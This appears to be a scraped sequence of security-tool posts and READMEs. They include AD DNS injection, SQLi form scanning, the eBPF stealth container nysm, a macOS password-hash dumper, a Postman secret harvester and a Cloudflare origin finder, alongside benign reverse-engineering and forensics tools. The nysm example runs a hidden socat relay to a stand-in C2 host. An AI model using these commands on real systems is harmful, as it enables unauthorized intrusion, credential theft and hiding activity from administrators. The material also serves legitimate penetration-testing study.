    The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.


    Prerequisites

    gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.

    Windows

    On Windows hosts, the MIT Kerberos software should be installed in addition to the python modules listed in requirements.txt, this can be obtained at the MIT Kerberos Distribution Page. Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf

    Linux

    The libkrb5-dev package needs to be installed prior to installing python requirements

    All

    Once the requirements are satisfied, you can install the python dependencies via pip/pip3 tool

    pip install -r requirements.txt

    Enumeration Mode

    The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.

    Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.

    Example

    python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
    [=] Found 2 non Windows machines registered within AD
    [!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
    [+] Host centos.ad.ginge.com has GSSAPI enabled over SSH

    DNS Mode

    DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently dns mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targetting a specific domain controller, e.g. DNS/dc1.victim.local.

    Examples

    Adding a DNS A record for host ahost.ad.ginge.com

    python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
    [+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
    [=] Adding A record for target ahost using data 192.168.128.50
    [+] Applied 1 updates successfully

    Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a ., this is important or the record becomes a relative record to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones to A records.

    python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
    [+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
    [=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
    [+] Applied 1 updates successfully

    Forward and reverse DNS lookup results after execution

    nslookup ahost.ad.ginge.com
    Server: WIN-AF8KI8E5414.ad.ginge.com
    Address: 192.168.128.1

    Name: ahost.ad.ginge.com
    Address: 192.168.128.50
    nslookup 192.168.128.50
    Server: WIN-AF8KI8E5414.ad.ginge.com
    Address: 192.168.128.1

    Name: ahost.ad.ginge.com
    Address: 192.168.128.50


    Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning

    By: Zion3R


    A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning

    Features

    • login panel Scanning for multiple hosts
    • Proxy compatibility (http, https)
    • Login panel scanning are done in multiprocessing

    so the script is super fast at scanning many urls

    quick tutorial & screenshots are shown at the bottom
    project contribution tips at the bottom

    Β 

    Installation

    git clone https://github.com/Mr-Robert0/Logsensor.git
    cd Logsensor && sudo chmod +x logsensor.py install.sh
    pip install -r requirements.txt
    ./install.sh

    Dependencies

    Β 

    Quick Tutorial

    1. Multiple hosts scanning to detect login panels

    • You can increase the threads (default 30)
    • only run login detector module
    python3 logsensor.py -f <subdomains-list> 
    python3 logsensor.py -f <subdomains-list> -t 50
    python3 logsensor.py -f <subdomains-list> --login

    2. Targeted SQLi form scanning

    • can provide only specifc url of login panel with --sqli or -s flag for run only SQLi form scanning Module
    • turn on the proxy to see the requests
    • customize user input name of login panel with actual name (default "username")
    python logsensor.py -u www.example.com/login --sqli 
    python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
    python logsensor.py -u www.example.com/login -s --inputname email

    View help

    Login panel Detector Module -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email') -t , --threads Number of threads (default 30) -h, --help Show this help message and exit " dir="auto">
    python logsensor.py --help

    usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]

    optional arguments:
    -u , --url Target URL (e.g. http://example.com/ )
    -f , --file Select a target hosts list file (e.g. list.txt )
    --proxy Proxy (e.g. http://127.0.0.1:8080)
    -l, --login run only Login panel Detector Module
    -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
    -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
    -t , --threads Number of threads (default 30)
    -h, --help Show this help message and exit

    Screenshots


    Development

    TODO

    1. adding "POST form SQli (Time based) scanning" and check for delay
    2. Fuzzing on Url Paths So as not to miss any login panel


    Nysm - A Stealth Post-Exploitation Container

    By: Zion3R


    A stealth post-exploitation container.

    Introduction

    With the raise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: Would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of System Administrators, not only by hiding eBPF, but much more:

    • bpftool
    • bpflist-bpfcc
    • ps
    • top
    • sockstat
    • ss
    • rkhunter
    • chkrootkit
    • lsof
    • auditd
    • etc...

    All these tools go blind to what goes through nysm. It hides:

    • New eBPF programs
    • New eBPF maps ️
    • New eBPF links ο”—
    • New Auditd generated logs ο“°
    • New PIDs οͺͺ
    • New sockets ο”Œ

    Warning This tool is a simple demonstration of eBPF capabilities as such. It is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.

    Β 

    Installation

    Requirements

    sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

    Linux headers

    cd ./nysm/src/
    bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

    Build

    cd ./nysm/src/
    make

    Usage

    nysm is a simple program to run before the intended command:

    Usage: nysm [OPTION...] COMMAND
    Stealth eBPF container.

    -d, --detach Run COMMAND in background
    -r, --rm Self destruct after execution
    -v, --verbose Produce verbose output
    -h, --help Display this help
    --usage Display a short usage message

    Examples

    Run a hidden bash:

    ./nysm bash

    Run a hidden ssh and remove ./nysm:

    ./nysm -r ssh user@domain

    Run a hidden socat as a daemon and remove ./nysm:

    ./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

    How it works

    In general

    As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.

    To differentiate nysm events from the others, everything runs inside a seperated PID namespace.

    Hide eBPF objects

    bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.

    As any eBPF program, bpftool uses the bpf() system call, and more specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed by the attr argument.

    To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exists, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.

    In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.

    Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().

    Hide Auditd logs

    Auditd receives its logs from recvfrom() which stores its messages in a buffer.

    If the message received was generated by a nysm process through audit_log_end(), it replaces the message length in its nlmsghdr header by 0.

    Hide PIDS

    Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record.

    As getdents64() requires to loop through all its files, the eBPF instructions limit is easily reached. Therefore, nysm uses tail calls before reaching it.

    Hide sockets

    Hiding sockets is a big word. In fact, opened sockets are already hidden from many tools as they cannot find the process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag which returns all the currently opened sockets. After that, ss receives the result through recvmsg() in a message buffer and the returned value is the length of all these messages combined.

    Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.

    These are collected from the connect() and bind() calls.

    Limitations

    Even with the best effort, nysm still has some limitations.

    • Every tool that does not close their file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash is running before top, the processes will not show up. But, if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.

    • Kernel logs: dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop several times because of the eBPF verifier on nysm run.

    • Many traces written into files are left as hooking read() and write() would be too heavy (but still possible). For example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.

    • Hiding ss recvmsg can be challenging as a new socket can pop at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to switch place between the first one and the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket information with hardcoded values.

    • Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided as it would hide every non-nysm eBPF objects.

    Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.



    PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

    By: Zion3R


    PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

    Features:

    • Utilizes a list of proxy IP addresses from a specified file.
    • Supports both HTTP and HTTPS proxies.
    • Allows users to input the target website URL, proxy file path, and a static port.
    • Makes HTTP requests to the specified website using each proxy.
    • Parses HTML content to extract and visit links on the webpage.

    Usage:

    • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
    • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
    • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
    • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
    • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

    Get New Proxies with port and add in proxies.txt in this format 50.168.163.176:80
    • You can add it from here: https://free-proxy-list.net/ these free proxies are not validated some might not work so first validate these proxies before adding.

    How to Use:

    1. Clone the repository:
    git clone https://github.com/spyboy-productions/PhantomCrawler.git
    1. Install dependencies:
    pip3 install -r requirements.txt
    1. Run the script:
    python3 PhantomCrawler.py

    Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


    Snapshots:

    If you find this GitHub repo useful, please consider giving it a star!Β 



    Pantheon - Insecure Camera Parser

    By: Zion3R


    Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

    Functionalities

    Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.


    Installation

    1. git clone https://github.com/josh0xA/Pantheon.git
    2. cd Pantheon
    3. pip3 install -r requirements.txt
      Execution: python3 pantheon.py
    • Note: I will later add a GUI installer to make it fully indepenent of a CLI

    Windows

    • You can just follow the steps above or download the official package here.
    • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

    Ubuntu

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/ubuntu_install.sh
    • ./distros/ubuntu_install.sh

    Debian and Kali Linux

    • First, complete steps 1, 2 and 3 listed above.
    • chmod +x distros/debian-kali_install.sh
    • ./distros/debian-kali_install.sh

    MacOS

    • The regular installation steps above should suffice. If not, open up an issue.

    Usage

    (Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

    (Left-click) on a selected IP:Port to view the geolocation of the camera.
    (Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

    Adjust the map as you please to see the markers.

    • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

    Ethical Notice

    The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

    Licence

    MIT License
    Copyright (c) Josh Schiavone



    Top 20 Most Popular Hacking Tools in 2023

    By: Zion3R

    As last year, this year we made a ranking with the most popular tools between January and December 2023.

    The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

    Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2023:


    1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


    2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


    3. Faraday - Open Source Vulnerability Management Platform


    4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


    5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


    6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


    7. Waf-Bypass - Check Your WAF Before An Attacker Does


    8. PentestGPT - A GPT-empowered Penetration Testing Tool


    9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


    10. LSMS - Linux Security And Monitoring Scripts


    11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


    12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


    13. ThunderCloud - Cloud Exploit Framework


    14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


    15. Kscan - Simple Asset Mapping Tool


    16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


    17. DNSWatch - DNS Traffic Sniffer and Analyzer


    18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


    19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


    20. XSS-Exploitation-Tool - An XSS Exploitation Tool





    Happy New Year wishes the KitPloit team!


    Blutter - Flutter Mobile Application Reverse Engineering Tool

    By: Zion3R


    Flutter Mobile Application Reverse Engineering Tool by Compiling Dart AOT Runtime

    Currently the application supports only Android libapp.so (arm64 only). Also the application is currently work only against recent Dart versions.

    For high priority missing features, see TODO


    Environment Setup

    This application uses C++20 Formatting library. It requires very recent C++ compiler such as g++>=13, Clang>=15.

    I recommend using Linux OS (only tested on Deiban sid/trixie) because it is easy to setup.

    Debian Unstable (gcc 13)

    • Install build tools and depenencies
    apt install python3-pyelftools python3-requests git cmake ninja-build \
    build-essential pkg-config libicu-dev libcapstone-dev

    Windows

    • Install git and python 3
    • Install latest Visual Studio with "Desktop development with C++" and "C++ CMake tools"
    • Install required libraries (libcapstone and libicu4c)
    python scripts\init_env_win.py
    • Start "x64 Native Tools Command Prompt"

    macOS Ventura (clang 15)

    • Install XCode
    • Install clang 15 and required tools
    brew install llvm@15 cmake ninja pkg-config icu4c capstone
    pip3 install pyelftools requests

    Usage

    Extract "lib" directory from apk file

    python3 blutter.py path/to/app/lib/arm64-v8a out_dir

    The blutter.py will automatically detect the Dart version from the flutter engine and call executable of blutter to get the information from libapp.so.

    If the blutter executable for required Dart version does not exists, the script will automatically checkout Dart source code and compiling it.

    Update

    You can use git pull to update and run blutter.py with --rebuild option to force rebuild the executable

    python3 blutter.py path/to/app/lib/arm64-v8a out_dir --rebuild

    Output files

    • asm/* libapp assemblies with symbols
    • blutter_frida.js the frida script template for the target application
    • objs.txt complete (nested) dump of Object from Object Pool
    • pp.txt all Dart objects in Object Pool

    Directories

    • bin contains blutter executables for each Dart version in "blutter_dartvm<ver>_<os>_<arch>" format
    • blutter contains source code. need building against Dart VM library
    • build contains building projects which can be deleted after finishing the build process
    • dartsdk contains checkout of Dart Runtime which can be deleted after finishing the build process
    • external contains 3rd party libraries for Windows only
    • packages contains the static libraries of Dart Runtime
    • scripts contains python scripts for getting/building Dart

    Generating Visual Studio Solution for Development

    I use Visual Studio to delevlop Blutter on Windows. --vs-sln options can be used to generate a Visual Studio solution.

    python blutter.py path\to\lib\arm64-v8a build\vs --vs-sln

    TODO

    • More code analysis
      • Function arguments and return type
      • Some psuedo code for code pattern
    • Generate better Frida script
      • More internal classes
      • Object modification
    • Obfuscated app (still missing many functions)
    • Reading iOS binary
    • Input as apk or ipa


    Osx-Password-Dumper - A Tool To Dump Users'S .Plist On A Mac OS System And To Convert Them Into A Crackable Hash

    By: Zion3R


     ο”“ OSX Password Dumper Script

    Overview

    A bash script to retrieve user's .plist files on a macOS system and to convert the data inside it to a crackable hash format. (to use with John The Ripper or Hashcat)

    Useful for CTFs/Pentesting/Red Teaming on macOS systems.


    Prerequisites

    • The script must be run as a root user (sudo)
    • macOS environment (tested on a macOS VM Ventura beta 13.0 (22A5266r))

    Usage

    sudo ./osx_password_cracker.sh OUTPUT_FILE /path/to/save/.plist


    CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

    By: Zion3R


    CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


    Key Features:

    • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

    • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

    • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

    • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

    With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.

    Limitation

    infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information. 3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare. " dir="auto">
    - Still in the development phase, sometimes it can't detect the real Ip.

    - CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

    1. False Negatives: CloakReveal3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

    2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

    3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the pri mary host. Some subdomains may also be protected by Cloudflare.

    This tool is a Proof of Concept and is for Educational Purposes Only.

    How to Use:

    1. Run CloudScan with a single command-line argument: the target domain you want to analyze.

       git clone https://github.com/spyboy-productions/CloakQuest3r.git
      cd CloakQuest3r
      pip3 install -r requirements.txt
      python cloakquest3r.py example.com
    2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

    3. If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.

    4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

    5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

    CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

    Run It Online:

    Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r



    Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

    By: Zion3R


    Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

    Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

    • Workspaces
    • Collections
    • Requests
    • Users
    • Teams

    Installation

    python3 -m pip install porch-pirate

    Using the client

    The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

    Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

    • --globals
    • --collections
    • --requests
    • --urls
    • --dump
    • --raw
    • --curl

    Simple Search

    porch-pirate -s "coca-cola.com"

    Get Workspace Globals

    By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

    Dump Workspace

    When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

    Automatic Search and Globals Extraction

    Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

    porch-pirate -s "shopify" --globals

    Automatic Search Dump

    Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

    porch-pirate -s "coca-cola.com" --dump

    Extract URLs from Workspace

    A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

    Automatic URL Extraction

    Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

    porch-pirate -s "coca-cola.com" --urls

    Show Collections in a Workspace

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

    Show Workspace Requests

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

    Show raw JSON

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

    Show Entity Information

    porch-pirate -w WORKSPACE_ID
    porch-pirate -c COLLECTION_ID
    porch-pirate -r REQUEST_ID
    porch-pirate -u USERNAME/TEAMNAME

    Convert Request to Curl

    Porch Pirate can build curl requests when provided with a request ID for easier testing.

    porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

    Use a proxy

    porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

    Using as a library

    Searching

    p = porchpirate()
    print(p.search('coca-cola.com'))

    Get Workspace Collections

    p = porchpirate()
    print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Dumping a Workspace

    p = porchpirate()
    collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
    for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
    request_data = p.request(r['id'])
    print(request_data)

    Grabbing a Workspace's Globals

    p = porchpirate()
    print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Other Examples

    Other library usage examples can be located in the examples directory, which contains the following examples:

    • dump_workspace.py
    • format_search_results.py
    • format_workspace_collections.py
    • format_workspace_globals.py
    • get_collection.py
    • get_collections.py
    • get_profile.py
    • get_request.py
    • get_statistics.py
    • get_team.py
    • get_user.py
    • get_workspace.py
    • recursive_globals_from_search.py
    • request_to_curl.py
    • search.py
    • search_by_page.py
    • workspace_collections.py


    Windiff - Web-based Tool That Allows Comparing Symbol, Type And Syscall Information Of Microsoft Windows Binaries Across Different Versions Of The OS

    By: Zion3R


    WinDiff is an open-source web-based tool that allows browsing and comparing symbol, type and syscall information of Microsoft Windows binaries across different versions of the operating system. The binary database is automatically updated to include information from the latest Windows updates (including Insider Preview).

    It was inspired by ntdiff and made possible with the help of Winbindex.


    How It Works

    WinDiff is made of two parts: a CLI tool written in Rust and a web frontend written in TypeScript using the Next.js framework.

    The CLI tool is used to generate compressed JSON databases out of a configuration file and relies on Winbindex to find and download the required PEs (and PDBs). Types are reconstructed using resym. The idea behind the CLI tool is to be able to easily update and regenerate databases as new versions of Windows are released. The CLI tool's code is in the windiff_cli directory.

    The frontend is used to visualize the data generated by the CLI tool, in a user-friendly way. The frontend follows the same principle as ntdiff, as it allows browsing information extracted from official Microsoft PEs and PDBs for certain versions of Microsoft Windows and also allows comparing this information between versions. The frontend's code is in the windiff_frontend directory.

    A scheduled GitHub action fetches new updates from Winbindex every day and updates the configuration file used to generate the live version of WinDiff. Currently, because of (free plans) storage and compute limitations, only KB and Insider Preview updates less than one year old are kept for the live version. You can of course rebuild a local version of WinDiff yourself, without those limitations if you need to. See the next section for that.

    Note: Winbindex doesn't provide unique download links for 100% of the indexed files, so it might happen that some PEs' information are unavailable in WinDiff because of that. However, as soon as these PEs are on VirusTotal, Winbindex will be able to provide unique download links for them and they will then be integrated into WinDiff automatically.

    How to Build

    Prerequisites

    • Rust 1.68 or superior
    • Node.js 16.8 or superior

    Command-Line

    The full build of WinDiff is "self-documented" in ci/build_frontend.sh, which is the build script used to build the live version of WinDiff. Here's what's inside:

    # Resolve the project's root folder
    PROJECT_ROOT=$(git rev-parse --show-toplevel)

    # Generate databases
    cd "$PROJECT_ROOT/windiff_cli"
    cargo run --release "$PROJECT_ROOT/ci/db_configuration.json" "$PROJECT_ROOT/windiff_frontend/public/"

    # Build the frontend
    cd "$PROJECT_ROOT/windiff_frontend"
    npm ci
    npm run build

    The configuration file used to generate the data for the live version of WinDiff is located here: ci/db_configuration.json, but you can customize it or use your own. PRs aimed at adding new binaries to track in the live configuration are welcome.



    OSINT-Framework - OSINT Framework

    By: Zion3R


    OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.

    I originally created this framework with an information security point of view. Since then, the response from other fields and disciplines has been incredible. I would love to be able to include any other OSINT resources, especially from fields outside of infosec. Please let me know about anything that might be missing!

    Please visit the framework at the link below and good hunting!


    https://osintframework.com

    Legend

    (T) - Indicates a link to a tool that must be installed and run locally
    (D) - Google Dork, for more information: Google Hacking
    (R) - Requires registration
    (M) - Indicates a URL that contains the search term and the URL itself must be edited manually

    For Update Notifications

    Follow me on Twitter: @jnordine - https://twitter.com/jnordine
    Watch or star the project on Github: https://github.com/lockfale/osint-framework

    Suggestions, Comments, Feedback

    Feedback or new tool suggestions are extremely welcome! Please feel free to submit a pull request or open an issue on github or reach out on Twitter.

    Contribute with a GitHub Pull Request

    For new resources, please ensure that the site is available for public and free use.

    1. Update the arf.json file in the format shown below. If this isn't the first entry for a folder, add a comma to the last closing brace of the previous entry.
  • Submit pull request!
  • Thank you!

    OSINT Framework Website

    https://osintframework.com

    Happy Hunting!



    ICS-Forensics-Tools - Microsoft ICS Forensics Framework

    By: Zion3R


    Microsoft ICS Forensics Tools is an open source forensic framework for analyzing Industrial PLC metadata and project files.
    it enables investigators to identify suspicious artifacts on ICS environment for detection of compromised devices during incident response or manual check.
    open source framework, which allows investigators to verify the actions of the tool or customize it to specific needs.


    Getting Started

    These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

    git clone https://github.com/microsoft/ics-forensics-tools.git

    Prerequisites

    Installing

    • Install python requirements

      pip install -r requirements.txt

    Usage

    General application arguments:

    Args Description Required / Optional
    -h, --help show this help message and exit Optional
    -s, --save-config Save config file for easy future usage Optional
    -c, --config Config file path, default is config.json Optional
    -o, --output-dir Directory in which to output any generated files, default is output Optional
    -v, --verbose Log output to a file as well as the console Optional
    -p, --multiprocess Run in multiprocess mode by number of plugins/analyzers Optional

    Specific plugin arguments:

    Args Description Required / Optional
    -h, --help show this help message and exit Optional
    --ip Addresses file path, CIDR or IP addresses csv (ip column required).
    add more columns for additional info about each ip (username, pass, etc...)
    Required
    --port Port number Optional
    --transport tcp/udp Optional
    --analyzer Analyzer name to run Optional

    Executing examples in the command line

     python driver.py -s -v PluginName --ip ips.csv
    python driver.py -s -v PluginName --analyzer AnalyzerName
    python driver.py -s -v -c config.json --multiprocess

    Import as library example

    from forensic.client.forensic_client import ForensicClient
    from forensic.interfaces.plugin import PluginConfig
    forensic = ForensicClient()
    plugin = PluginConfig.from_json({
    "name": "PluginName",
    "port": 123,
    "transport": "tcp",
    "addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}],
    "parameters": {
    },
    "analyzers": []
    })
    forensic.scan([plugin])

    Architecture

    Adding Plugins

    When developing locally make sure to mark src folder as "Sources root"

    • Create new directory under plugins folder with your plugin name
    • Create new Python file with your plugin name
    • Use the following template to write your plugin and replace 'General' with your plugin name
    from pathlib import Path
    from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
    from forensic.common.constants.constants import Transport


    class GeneralCLI(PluginCLI):
    def __init__(self, folder_name):
    super().__init__(folder_name)
    self.name = "General"
